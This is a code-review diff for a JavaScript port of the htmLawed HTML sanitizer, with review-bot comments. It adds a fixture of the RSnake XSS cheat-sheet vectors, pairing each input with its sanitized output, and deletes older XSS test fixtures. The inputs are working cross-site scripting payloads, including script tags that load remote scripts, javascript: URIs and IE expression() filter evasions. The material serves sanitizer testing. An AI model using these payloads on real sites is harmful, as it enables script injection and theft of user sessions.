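Review bot: This expected-output fixture is only as strong as whatever generated it, and the commit does not say: the header names htmLawed 1.1.22 and the PHP test-case file, so if it was produced by the PHP reference implementation it is a genuine cross-implementation oracle, but if it was captured from this port's own output the comparison merely pins current behaviour, bugs included. A one-line note in the test script (the fixture itself cannot carry a comment without breaking the byte comparison) stating the provenance, e.g. `// htmLawed_TESTCASE_out.htm generated by PHP htmLawed 1.1.22 with safe=1, keep_bad=1`, would make that explicit. A few entries deserve a manual look precisely because a golden file can silently bless them: the style values at L436-L437 keep `'onmouseover='alert(1)//` and an `onerror=` fragment verbatim, inert only because the attribute stays double-quoted and the stray quotes are not re-emitted as attribute delimiters, and the IE7 cases at L447-L469 depend on `expression(` being stripped while the surrounding text survives.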

rsnake_xss.txt Normal file

@ -0,0 +1,642 @@
1. XSS Locator
Input code »
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Output code »
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
2. XSS Quick Test
Input code »
'';!--"<XSS>=&{()}
Output code »
'';!--"&lt;XSS&gt;=&amp;{()}
3. SCRIPT w/Alert()
Input code »
<SCRIPT>alert('XSS')</SCRIPT>
Output code »
&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;
4. SCRIPT w/Source File
Input code »
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
Output code »
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;
5. SCRIPT w/Char Code
Input code »
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Output code »
&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
6. DIV background-image 1
Input code »
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
Output code »
<div style="background-image: url(denied:javascript:alert('XSS'))"></div>
7. DIV background-image 2
Input code »
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
Output code »
<div style="background-image: url(denied:&amp;#1;javascript:alert('XSS'))"></div>
8. DIV expression
Input code »
<DIV STYLE="width: expression(alert('XSS'));">
Output code »
<div style="width: (alert('XSS'));"></div>
9. IFRAME
Input code »
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
Output code »
&lt;IFRAME SRC="javascript:alert('XSS');"&gt;&lt;/IFRAME&gt;
10. INPUT Image
Input code »
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
Output code »
<input type="image" src="denied:javascript:alert('XSS');" />
11. IMG w/JavaScript Directive
Input code »
<IMG SRC="javascript:alert('XSS');">
Output code »
<img src="denied:javascript:alert('XSS');" alt="image" />
12. IMG No Quotes/Semicolon
Input code »
<IMG SRC=javascript:alert('XSS')>
Output code »
<img src="denied:javascript:alert(" alt="image" />
13. IMG Dynsrc
Input code »
<IMG DYNSRC="javascript:alert('XSS');">
Output code »
<img src="src" alt="image" />
14. IMG Lowsrc
Input code »
<IMG LOWSRC="javascript:alert('XSS');">
Output code »
<img src="src" alt="image" />
15. IMG Embedded commands 1
Input code »
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
Output code »
<img src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode" alt="image" />
16. IMG Embedded commands 2
Input code »
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
Output code »
Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser
17. IMG STYLE w/expression
Input code »
exp/*<XSS STYLE='no\xss:noxss("*//*");
xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
Output code »
exp/*&lt;XSS STYLE='no\xss:noxss("*//*");
xss:&#101;x&#x2f;*XSS*//*/*/pression(alert("XSS"))'&gt;
18. IMG w/VBscript
Input code »
<IMG SRC='vbscript:msgbox("XSS")'>
Output code »
<img src="denied:vbscript:msgbox(&quot;XSS&quot;)" alt="image" />
19. LAYER
Input code »
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
Output code »
&lt;LAYER SRC="http://ha.ckers.org/scriptlet.html"&gt;&lt;/LAYER&gt;
20. Livescript
Input code »
<IMG SRC="livescript:[code]">
Output code »
<img src="denied:livescript:[code]" alt="image" />
21. US-ASCII encoding
Input code »
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
Output code »
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
22. Mocha
Input code »
<IMG SRC="mocha:[code]">
Output code »
<img src="denied:mocha:[code]" alt="image" />
23. OBJECT
Input code »
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
Output code »
&lt;OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"&gt;&lt;/OBJECT&gt;
24. OBJECT w/Embedded XSS
Input code »
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
Output code »
&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name="url" value="javascript:alert(" /&gt;&lt;/OBJECT&gt;
25. Embed Flash
Input code »
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
Output code »
&lt;EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"&gt;&lt;/EMBED&gt;
26. OBJECT w/Flash 2
Input code »
a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")";
eval(a+b+c+d);
Output code »
a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")";
eval(a+b+c+d);
27. STYLE
Input code »
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
Output code »
&lt;STYLE TYPE="text/javascript"&gt;alert('XSS');&lt;/STYLE&gt;
28. STYLE w/Comment
Input code »
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
Output code »
<img style="xss:expr XSS*/ession(alert('XSS'))" src="src" alt="image" />
29. STYLE w/Anonymous HTML
Input code »
<XSS STYLE="xss:expression(alert('XSS'))">
Output code »
&lt;XSS STYLE="xss:expression(alert('XSS'))"&gt;
30. TABLE
Input code »
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
Output code »
<table></table>
31. TD
Input code »
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
Output code »
<table>&lt;td&gt;&lt;/td&gt;</table>
32. XML namespace
Input code »
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
Output code »
&lt;HTML xmlns:xss&gt;
&lt;?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"&gt;
&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;
&lt;/HTML&gt;
33. XML data island w/CDATA
Input code »
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
Output code »
&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC="javas]]&gt;&lt;![CDATA[cript:alert('XSS');"&gt;]]&gt;
&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;<span></span>
34. XML data island w/comment
Input code »
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
Output code »
&lt;XML ID="xss"&gt;<i><b><img src="src" alt="image" />cript:alert('XSS')"&gt;</b></i>&lt;/XML&gt;
<span></span>
35. XML (locally hosted)
Input code »
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
Output code »
&lt;XML SRC="http://ha.ckers.org/xsstest.xml" ID=I&gt;&lt;/XML&gt;
<span></span>
36. XML HTML+TIME
Input code »
<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>
Output code »
&lt;HTML&gt;&lt;BODY&gt;
&lt;?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"&gt;
&lt;?import namespace="t" implementation="#default#time2"&gt;
&lt;t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert('XSS')&lt;/SCRIPT&gt;"&gt; &lt;/BODY&gt;&lt;/HTML&gt;
37. Commented-out Block
Input code »
<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->
Output code »
&lt;!--[if gte IE 4]&gt;
&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;
&lt;![endif]--&gt;
38. Rename .js to .jpg
Input code »
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
Output code »
&lt;SCRIPT SRC="http://ha.ckers.org/xss.jpg"&gt;&lt;/SCRIPT&gt;
39. SSI
Input code »
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
Output code »
&lt;!--#exec cmd="/bin/echo '&lt;SCRIPT SRC'"--&gt;&lt;!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;'"--&gt;
40. PHP
Input code »
<? echo('<SCR)';
echo('IPT>alert("XSS")</SCRIPT>'); ?>
Output code »
&lt;? echo('&lt;SCR)';
echo('IPT&gt;alert("XSS")&lt;/SCRIPT&gt;'); ?&gt;
41. JavaScript Includes
Input code »
<BR SIZE="&{alert('XSS')}">
Output code »
<br />
42. Case Insensitive
Input code »
<IMG SRC=JaVaScRiPt:alert('XSS')>
Output code »
<img src="denied:JaVaScRiPt:alert(" alt="image" />
43. HTML Entities
Input code »
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
Output code »
<img src="denied:javascript:alert(&quot;XSS&quot;)" alt="image" />
44. Grave Accents
Input code »
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
Output code »
<img src="denied:`javascript:alert(" alt="image" />
45. Image w/CharCode
Input code »
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
Output code »
<img src="denied:javascript:alert(String.fromCharCode(88,83,83))" alt="image" />
46. UTF-8 Unicode Encoding
Input code »
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
Output code »
<img src="denied:&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;" alt="image" />
47. Long UTF-8 Unicode w/out Semicolons
Input code »
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
Output code »
<img src="&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041" alt="image" />
48. DIV w/Unicode
Input code »
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
Output code »
<div style="background-image: 075 072 06C 028' 06a 061 076 061 073 063 072 069 070 074 03a 061 06c 065 072 074 028.1027 058.1053 053 027 029' 029"></div>
49. Hex Encoding w/out Semicolons
Input code »
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
Output code »
<img src="&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29" alt="image" />
50. Embedded Tab
Input code »
<IMG SRC="jav ascript:alert('XSS');">
Output code »
<img src="denied:jav ascript:alert('XSS');" alt="image" />
51. Embedded Encoded Tab
Input code »
<IMG SRC="jav&#x09;ascript:alert('XSS');">
Output code »
<img src="denied:jav&#x9;ascript:alert('XSS');" alt="image" />
52. Embedded Newline
Input code »
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
Output code »
<img src="denied:jav&#xa;ascript:alert('XSS');" alt="image" />
53. Embedded Carriage Return
Input code »
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
Output code »
<img src="denied:jav&#xd;ascript:alert('XSS');" alt="image" />
54. Multiline w/Carriage Returns
Input code »
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
Output code »
<img src="denied:j a v a s c r i p t : a l e r t ( ' X S S ' )" alt="image" />
55. Spaces/Meta Chars
Input code »
<IMG SRC=" &#14; javascript:alert('XSS');">
Output code »
<img src="denied:&amp;#14; javascript:alert('XSS');" alt="image" />
56. Non-Alpha/Non-Digit
Input code »
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
&lt;SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
57. Non-Alpha/Non-Digit Part 2
Input code »
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
Output code »
&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert("XSS")&gt;
58. No Closing Script Tag
Input code »
<SCRIPT SRC=http://ha.ckers.org/xss.js
Output code »
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js
59. Protocol resolution in script tags
Input code »
<SCRIPT SRC=//ha.ckers.org/.j>
Output code »
&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;
60. Half-Open HTML/JavaScript
Input code »
<IMG SRC="javascript:alert('XSS')"
Output code »
&lt;IMG SRC="javascript:alert('XSS')"
61. Double open angle brackets
Input code »
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
Output code »
&lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt;
62. Extraneous Open Brackets
Input code »
<<SCRIPT>alert("XSS");//<</SCRIPT>
Output code »
&lt;&lt;SCRIPT&gt;alert("XSS");//&lt;&lt;/SCRIPT&gt;
63. Malformed IMG Tags
Input code »
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
Output code »
<img src="src" alt="image" />&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;"&gt;
64. No Quotes/Semicolons
Input code »
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
Output code »
&lt;SCRIPT&gt;a=/XSS/
alert(a.source)&lt;/SCRIPT&gt;
65. Evade Regex Filter 1
Input code »
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
&lt;SCRIPT a="&gt;" SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
66. Evade Regex Filter 2
Input code »
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
&lt;SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
67. Evade Regex Filter 3
Input code »
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
&lt;SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
68. Evade Regex Filter 4
Input code »
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
&lt;SCRIPT "a='&gt;'" SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
69. Evade Regex Filter 5
Input code »
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
&lt;SCRIPT a=`&gt;` SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
70. Filter Evasion 1
Input code »
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
&lt;SCRIPT&gt;document.write("&lt;SCRI");&lt;/SCRIPT&gt;PT SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
71. Filter Evasion 2
Input code »
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »
&lt;SCRIPT a="&gt;'&gt;" SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
72. Mixed Encoding
Input code »
<A HREF="h
tt p://6&#09;6.000146.0x7.147/">XSS</A>
Output code »
<a href="denied:h tt p://6&#9;6.000146.0x7.147/">XSS</a>
73. JavaScript Link Location
Input code »
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
Output code »
<a href="denied:javascript:document.location='http://www.google.com/'">XSS</a>


@ -2,4 +2,4 @@
# php -r 'require "htmLawed.php"; print htmLawed::sanitize(file_get_contents("test_xss.txt"), array("safe" => 1));' > test_php.htm
node_modules/.bin/eslint --rulesdir eslint-plugin-no-regex-dot htmLawed.js
node_modules/.bin/babel htmLawed.js > htmLawed.c.js
nodejs htmLawed-test.js test_xss.txt
nodejs htmLawed-test.js
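Review bot: The new last line runs the test harness but nothing in this script acts on its outcome, so a regression in any of the sanitizer's golden outputs (the rsnake cases, the TESTCASE comparison) would surface only as a printed "NOT OK" line and not as a failing step. If this file is meant to gate a release, follow the call with an explicit check, e.g. `nodejs htmLawed-test.js || exit 1`, and make the harness itself exit non-zero on any mismatch — it appears to report results via console output alone. The eslint and babel lines above are likewise unchecked, so a `set -e` near the top would cover all three; the beginning of the file is outside this hunk. It would also help to record, next to the commented-out PHP reference command, which PHP htmLawed version the expected outputs were generated from, since the comparison is only meaningful against a fixed reference.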


@ -1,42 +0,0 @@
<img alt="&lt;img onmouseover=confirm(1)//" src="src" />
'';!--"=&amp;{()}<br />
<img src="denied:javascript%3Aalert('xss');" alt="image" /><br />
<img src="denied:javascript:alert('xss');" alt="image" /><br />
<img src="denied:java script:alert('xss');" alt="image" /><br />
<img src="denied:&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;" alt="image" /><br />
<span style="color: #FF6699'onmouseover='alert(1)//;">test</span>
<span style="color: img//onerror='alert`www.ptsecurity.com`'src=Psych0tr1a;">
<br />
<br />
<br />
&lt;!--[if gte IE 4]&gt;alert('xss');&lt;![endif]--&gt;<br />
" src="http://ha.ckers.org/xss.js"&gt;<br />
<strong>Bad in PHP version without safe:</strong> " ";alert(window.location.href);//&gt;<br />
<br />
<a style=";-moz-binding:url(denied:http://lukasz.pilorz.net/xss/xss.xml#xss)" href="http://example.com">test</a><br />
<strong>Bad IE7:</strong> <a href="http://x&amp;x=%22+style%3d%22background-image%3a+expression%28alert %28%27xss%3f%29%29">x</a><br />
<strong>Opera:</strong> <a href="denied:\xE2\x80\x83javascript:alert(123)">link</a>
<strong>Bad IE7:</strong> <a style="color:expr comment*/ession(alert(document.domain))">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: %45xpression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: expr%45ssion(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp */ression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp */ression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/ * * /ression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: x */ (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ */ (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="x" style="width: *** *;;;;;;*/ */(alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> <a href="x" style="padding:10px; background: */ (alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> <a href="x" style="background: huh */ */ (alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> <a href="x" style="background: */ (alert('xss'));background: */ (alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> exp/*<a style="no ss:noxss(&quot;*/ &quot;);xss:ex XSS*/ /pression(alert(&quot;XSS&quot;))">x</a><br />
<strong>Bad IE7:</strong> <a style="background:expre sion(alert('xss'));">hi</a><br />
<strong>Bad IE7:</strong> <a style="background:expre sion(alert('xss'));">hi</a><br />
<strong>Bad IE7:</strong> <a style="color: 065 078 070 072 065 073 073 069 06f 06e 028 061 06c 065 072 074 028 031 029 029">test</a><br />
<strong>Bad IE7:</strong> <a style="xss:e #48;&#48;&#55;&#56;pression(window.x?0:(alert(/XSS/),window.x=1));">hi</a><br />
<strong>Bad IE7:</strong> <a style="background:url('denied:java script:eval(document.all.mycode.expr)')">hi</a><br />
</span>


@ -1,44 +0,0 @@
<img alt="<img onmouseover=confirm(1)//"<"">
'';!--"<xss>=&{()}<br />
<img src="javascript%3Aalert('xss');" /><br />
<img src="javascript:alert('xss');" /><br />
<img src="java script:alert('xss');" /><br />
<img
src=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41; /><br />
<font color='#FF6699"onmouseover="alert(1)//'>test</font>
<font color='<img//onerror="alert`www.ptsecurity.com`"src=Psych0tr1a'>
<div style="javascript:alert('xss');"></div><br />
<div style="background-image:url(javascript:alert('xss'));"></div><br />
<div style="background-image:url(&quot;javascript:alert('xss')&quot; );"></div><br />
<!--[if gte IE 4]><script>alert('xss');</script><![endif]--><br />
<script a=">" src="http://ha.ckers.org/xss.js"></script><br />
<strong>Bad in PHP version without safe:</strong> <script a=">" ";alert(window.location.href);//></script><br />
<div style="background-image: &#117;r&#x6C;('js&#58;xss'&#x29;"></div><br />
<a style=";-moz-binding:url(http://lukasz.pilorz.net/xss/xss.xml#xss)" href="http://example.com">test</a><br />
<strong>Bad IE7:</strong> <a href="http://x&x=%22+style%3d%22background-image%3a+expression%28alert
%28%27xss%3f%29%29">x</a><br />
<strong>Opera:</strong> <a href="\xE2\x80\x83javascript:alert(123)">link</a>
<strong>Bad IE7:</strong> <a style=color:expr/*comment*/ession(alert(document.domain))>xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp&#x72;ession(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: &#101;xpression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: %45xpression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background:/**/expression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background:/**/&#69;xpression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background:/**/Exp&#x72;ession(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: expr%45ssion(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/* */ression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp /* */ression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/ * * /ression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background:/* x */expression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background:/* */ */expression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="x" style="width: /****/**;;;;;;*/expression/**/(alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> <a href="x" style="padding:10px; background:/**/expression(alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> <a href="x" style="background: huh /* */ */expression(alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> <a href="x" style="background:/**/expression(alert('xss'));background:/**/expression(alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> exp/*<a style='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>x</a><br />
<strong>Bad IE7:</strong> <a style="background:&#69;xpre\ssion(alert('xss'));">hi</a><br />
<strong>Bad IE7:</strong> <a style="background:expre&#x5c;ssion(alert('xss'));">hi</a><br />
<strong>Bad IE7:</strong> <a style="color: \0065 \0078 \0070 \0072 \0065 \0073 \0073 \0069 \006f \006e \0028 \0061 \006c \0065 \0072 \0074 \0028 \0031 \0029 \0029">test</a><br />
<strong>Bad IE7:</strong> <a style="xss:e&#92;&#48;&#48;&#55;&#56;pression(window.x?0:(alert(/XSS/),window.x=1));">hi</a><br />
<strong>Bad IE7:</strong> <a style="background:url('java
script:eval(document.all.mycode.expr)')">hi</a><br />